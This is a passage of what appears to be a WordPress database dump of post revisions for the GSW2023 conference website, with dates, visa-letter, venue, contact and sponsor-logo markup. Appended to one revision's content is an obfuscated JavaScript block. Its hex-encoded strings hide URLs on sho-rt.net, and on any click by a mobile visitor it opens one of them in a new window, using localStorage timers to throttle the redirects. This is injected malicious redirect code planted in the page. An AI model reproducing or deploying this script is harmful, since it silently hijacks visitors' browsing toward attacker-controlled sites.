bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:11:08','2023-08-16 03:11:08','',3066,'https://gsw2023.com/?p=5283',0,'revision','',0),
(5284,1,'2023-08-16 03:12:03','2023-08-16 03:12:03','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155359389{margin-top: 85px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155416300{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" 